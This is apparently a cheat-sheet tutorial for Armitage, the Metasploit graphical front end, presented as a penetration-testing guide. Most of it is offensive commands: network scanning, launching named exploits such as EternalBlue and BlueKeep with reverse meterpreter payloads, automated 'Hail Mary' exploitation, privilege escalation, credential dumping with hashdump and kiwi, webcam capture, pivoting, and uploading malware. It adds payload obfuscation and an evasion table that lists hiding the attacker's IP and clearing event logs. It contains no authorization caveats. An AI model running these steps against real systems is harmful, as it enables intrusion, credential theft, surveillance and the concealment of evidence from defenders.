Armitage is a graphical user interface for Metasploit Framework that simplifies penetration testing by visualizing target networks, automatically recommending exploits, and enabling collaborative team-based attacks. It abstracts Metasploit’s command-line complexity while exposing advanced post-exploitation features through an intuitive visual interface.
# Install prerequisites
sudo apt-get update
sudo apt-get install -y metasploit-framework postgresql openjdk-11-jdk-headless
# Start PostgreSQL
sudo systemctl start postgresql
sudo systemctl enable postgresql
# Download Armitage
wget http://www.fastandeasyhacking.com/download/armitage/armitage140728.tgz
tar xzf armitage140728.tgz
cd armitage
chmod +x armitage
# Install Metasploit Framework first
# Then download and extract Armitage
brew install metasploit-framework
wget http://www.fastandeasyhacking.com/download/armitage/armitage140728.tgz
tar xzf armitage140728.tgz
cd armitage
./armitage
# Ensure Metasploit Framework is installed
# Download Armitage executable or use installer
# Extract and run armitage.exe
# Ensure PostgreSQL service is running
# Initialize PostgreSQL database for Metasploit
sudo msfdb init
# Verify database connection
msfconsole -d
# Navigate to Armitage directory
cd /path/to/armitage
# Run Armitage (requires X11 on Linux)
./armitage
# Specify connection details if needed
./armitage --host 127.0.0.1 --port 55553
| Connection Method | Command | Description |
|---|
| Local RPC | Connect automatically | Auto-connects to localhost MSFRPCd |
| Remote RPC | Input host & port | Connect to remote Metasploit RPC server |
| Team Server | Use Team Server dialog | Collaborate with other analysts |
# Method 1: Use Armitage GUI
# 1. Hosts → New Window (or use nmap)
# 2. Select target network (e.g., 192.168.1.0/24)
# 3. Scan tab shows progress
# Method 2: Run nmap from command line before Armitage
nmap -sV -O 192.168.1.0/24 > hosts.txt
# Method 3: MSFConsole integration
# Use Metasploit's auxiliary scanners before loading into Armitage
| Option | Purpose |
|---|
| Intense scan | Comprehensive OS detection & service version detection |
| Quick scan | Fast SYN scan for host discovery |
| Quick scan + UDP | Detect UDP services (DNS, SNMP, DHCP) |
| Custom | User-defined nmap arguments |
# Aggressive host discovery (Armitage imports these)
nmap -A -T4 192.168.1.0/24 -oX output.xml
# Service version detection
nmap -sV -p- 192.168.1.100
# OS fingerprinting
nmap -O 192.168.1.100
# UDP service discovery
nmap -sU -p 53,123,161,162,5353 192.168.1.100
# Specific service scan
nmap -p 21,22,25,80,139,445,3306 192.168.1.0/24
| Format | Command | Notes |
|---|
| Nmap XML | File → Import → Nmap XML | Recommended for automated import |
| Nessus | File → Import → Nessus file | Vulnerability scanner integration |
| Manual hosts | Hosts tab drag & drop | Manually add target IPs |
# Once hosts are imported in Armitage:
# 1. Right-click target → Scan
# 2. View Services tab for discovered ports/services
# 3. Right-click services → Search exploits
# 4. Armitage ranks matches by success probability
| Discovered Port | Common Service | Typical Vulnerabilities |
|---|
| 21 | FTP | Anonymous login, weak credentials |
| 22 | SSH | Weak key exchange, version exploits |
| 25 | SMTP | Open relay, user enumeration |
| 80 | HTTP | Web application vulnerabilities |
| 139 | NetBIOS | SMB exploits, null sessions |
| 445 | SMB | EternalBlue, RCE exploits |
| 3306 | MySQL | Weak credentials, RCE |
| 3389 | RDP | BlueKeep, credential attacks |
# Automatic recommendation (easiest)
# 1. Right-click target host
# 2. Select "Scan for exploits"
# 3. Armitage queries available exploits
# 4. View Hail Mary or filtered results
# Manual exploit search
# 1. Modules tab on left
# 2. Search by name or technique
# 3. Highlight → View info & options
| Step | Action | Description |
|---|
| 1 | Target selection | Right-click host or service |
| 2 | Exploit search | Auto-populate module based on service |
| 3 | View options | RHOST, RPORT, payload auto-filled |
| 4 | Set payload | Default usually meterpreter/reverse_tcp |
| 5 | Configure LHOST | Auto-detected, verify correctness |
| 6 | Launch | Click “Launch” to execute exploit |
| 7 | Interact | New shell/meterpreter session created |
# Windows SMB (445)
# Module: windows/smb/ms17_010_eternalblue
# Payload: windows/meterpreter/reverse_tcp
# Apache Struts (8080)
# Module: exploit/multi/http/struts2_rest_xstream
# Payload: java/meterpreter/reverse_tcp
# MySQL (3306)
# Module: exploit/mysql/mysql_udf_injection
# Payload: linux/x86/meterpreter/reverse_tcp
# RDP (3389)
# Module: exploit/windows/rdp/cve_2019_0708_bluekeep_rce
# Payload: windows/meterpreter/reverse_tcp
| Payload Type | Best For | LHOST/LPORT Setup |
|---|
| reverse_tcp | Most reliable | LHOST = attacker IP, LPORT = free port |
| bind_tcp | Firewall bypass | RPORT = listener on target |
| reverse_http | Proxy evasion | LHOST = attacker IP, LPORT = 80/443 |
| staged | Small shellcode | Uses multiple packets |
# Once exploit succeeds, meterpreter session opens automatically
# Right-click session in Targets tab → Interact
# Common post-ex commands in meterpreter shell:
sysinfo # System information
getuid # Current user
getsystem # Attempt privilege escalation
ps # List processes
migrate [PID] # Migrate to process (for stability)
screenshot # Capture desktop
webcam_snap # Capture webcam
hashdump # Extract SAM hashes (Windows)
| Command Type | Purpose | Syntax |
|---|
| Interactive shell | Direct command execution | shell in meterpreter |
| Command execution | Single command | execute -c cmd /c ipconfig |
| Script execution | Run batch/PowerShell | execute -f script.ps1 |
| Background jobs | Non-blocking commands | background to suspend session |
# Check current privileges
getuid
# Attempt local privilege escalation
getsystem
# Specific escalation modules (kernel exploits)
use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
run
# Extract credentials
run post/windows/gather/hashdump
run post/windows/gather/credentials/credential_collector
# Dump LSASS process (Mimikatz-style)
load kiwi
creds_all
# From compromised host, discover internal network
ipconfig /all # (Windows) View network config
ifconfig # (Linux) View network config
# Use Armitage to add discovered internal hosts
# Route through current session for further exploitation
# Create pivot through meterpreter
route add 10.0.0.0 255.255.255.0 [SESSION_ID]
# Run scanners through pivot
run auxiliary/scanner/smb/smb_version
# Download files from target
download C:\Windows\win.ini /tmp/win.ini
# Upload malware/tools
upload /path/to/tool.exe C:\Windows\Temp\tool.exe
# Traverse directories
cd C:\Users\Admin\Documents
ls
pwd
Cortana is Armitage’s built-in scripting language for automation and customization.
# Basic syntax - cortana language
on event_name {
# code here
}
# Example: Custom menu item
popup targets "Custom Action" {
println("Target: " . host($1));
}
# Auto-run exploit on discovered hosts
on beacon_initial {
# Runs when new host discovered
println("Found target: " . host($1));
show_message("New host detected");
}
# Custom command menu
popup meterpreter "Run Privilege Escalation" {
# Code executed on selected session
local('$session');
$session = $1;
cmd_exec($session, "getsystem");
}
| Method | Command | Notes |
|---|
| GUI menu | Armitage → Scripts → Load | Browse and load Cortana scripts |
| Startup | Add to ~/.armitage/startup.cortana | Auto-load on launch |
| Console | scripts/cortana/ directory | Pre-packaged with Armitage |
# Server machine runs MSFRPCd
msfconsole
# Alternative: standalone team server
./teamserver 192.168.1.100 password123
# Port default: 55553
# Each analyst connects via Armitage GUI
# 1. Click "Connect to Team Server"
# 2. Input server IP: 192.168.1.100
# 3. Input port: 55553
# 4. Input password: password123
# 5. Click "Connect"
| Feature | Behavior | Use Case |
|---|
| Shared targets | All analysts see hosts | Coordinate scanning |
| Session sharing | All can interact with shells | Collaborative post-ex |
| Chat | In-Armitage messaging | Team communication |
| Event logging | Audit trail of actions | Accountability |
| Permissions | Password-based access | Simple auth |
# Use VPN for team server communication
# Restrict team server to trusted IPs only
# Change default password regularly
# Log all team activities
# Use separate analyst accounts where possible
Hail Mary is Armitage’s fully automated exploitation mode that attempts all available exploits against discovered hosts ranked by success probability.
# In Armitage GUI:
# 1. Hosts → Select target(s)
# 2. Attacks → Hail Mary
# 3. Configure payload (meterpreter usually default)
# 4. Click "Launch"
# 5. Watch automation run exploits systematically
# Edit Hail Mary options:
# Armitage → Preferences → Hail Mary
# - Set threads for parallel exploitation
# - Enable/disable specific exploit types
# - Configure payload handler port
| Element | Function | Notes |
|---|
| Target list | Shows exploitation status | Color coding: pending, running, success |
| Logs | Detailed attempt history | Review failed exploits |
| Sessions | New shell/meterpreter created | Auto-interact on success |
| Output | Real-time feedback | Watch exploitation unfold |
# Critical for meterpreter stability
# Migrate to stable system process (not user process)
# List processes
ps
# Migrate (avoids session death if app closes)
migrate 892 # explorer.exe on Windows
# Best targets: svchost.exe, services.exe, lsass.exe
| Module Category | Examples | Purpose |
|---|
| Encoders | x86/shikata_ga_nai | Obfuscate payloads |
| Payloads | meterpreter/reverse_tcp | Shellcode delivery |
| Post | windows/gather/hashdump | Post-ex automation |
| Auxiliary | scanner/smb/smb_version | Information gathering |
# Add custom-written Metasploit modules:
# 1. Place module in ~/.msf4/modules/exploits/custom/
# 2. Reload Armitage
# 3. Module appears in Modules tree
# 4. Use like any built-in exploit
# Example path:
~/.msf4/modules/exploits/custom/my_custom_exploit.rb
# 1. Network Discovery
# Hosts → New Hosts Window
# Input target range: 192.168.1.0/24
# Select "Intense scan"
# Wait for nmap results
# 2. Service Enumeration
# Right-click each host → Scan (or import nmap XML)
# Review Services tab for vulnerable services
# 3. Vulnerability Assessment
# Right-click service → Search exploits
# Review Hail Mary recommendations
# 4. Exploitation
# Select exploit → Configure payload → Launch
# Wait for meterpreter session
# 5. Post-Exploitation
# Right-click session → Interact
# Execute privilege escalation, credential dumping, pivoting
# 6. Network Pivot & Lateral Movement
# Repeat steps 1-5 for internal network
# Use current session as pivot proxy
# 1. Identify web servers (port 80, 443, 8080, 8443)
# 2. Use browser + Burp/OWASP ZAP alongside Armitage
# 3. Look for web-related exploits:
# - Apache Struts
# - JBoss JMXInvokerServlet
# - WebLogic exploits
# 4. Launch web app exploits from Armitage
# 5. Post-ex with meterpreter from successful web exploit
# Once shell obtained:
# Windows credential harvesting
hashdump # Extract SAM
run post/windows/gather/hashdump
load kiwi
creds_all # Mimikatz-style dump
# Linux credential harvesting
cat /etc/passwd # User enumeration
cat /etc/shadow # (if root) Password hashes
run post/linux/gather/hashdump
# Pass-the-hash attacks with harvested credentials
# Use exploit/windows/smb/psexec with NTLM hash
| Issue | Cause | Solution |
|---|
| ”MSFRPCd connection refused” | Metasploit not running | Start msfconsole or teamserver |
| Exploit fails silently | Target not vulnerable | Try different exploit or verify service version |
| Meterpreter session dies | Process terminated | Use migrate to switch processes |
| GUI freezes | Long-running operation | Increase Java heap size: -Xmx1024m |
| Nmap import fails | Malformed XML | Re-run nmap with -oX flag |
# Increase Java memory for large networks
./armitage -Xmx2048m
# Reduce thread count for stability
# Armitage → Preferences → General → Thread count = 5
# Clear database if corrupted
sudo msfdb delete
sudo msfdb init
# Enable debug output
./armitage --verbose
# Monitor Metasploit console directly
msfconsole
jobs -l # View background jobs
# Obfuscate payloads
use encoder/x86/shikata_ga_nai
set PAYLOAD windows/meterpreter/reverse_tcp
set ITERATIONS 5 # Multiple encoding passes
# Use encrypted channels
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.1.50
set LPORT 443 # HTTPS default (less suspicious)
# Staged vs. stageless payloads
# Staged = smaller initial shellcode, multi-stage download
# Stageless = larger but single-stage (better for detection evasion)
| Practice | Reason | Implementation |
|---|
| Use VPN for team server | Hide attacker IP | Route all connections through VPN |
| Separate test network | Avoid detection | Run Armitage on isolated network |
| Log cleanup | Evidence removal | (post-exploitation) Clear event logs |
| Session rotation | Avoid detection | Periodically re-exploit for new sessions |
| Resource | URL | Purpose |
|---|
| Armitage Website | fastandeasyhacking.com | Official documentation & tutorials |
| Metasploit docs | docs.metasploit.com | Framework reference |
| MITRE ATT&CK | attack.mitre.org | Exploit technique mapping |
| Exploit-DB | exploit-db.com | Exploit database |
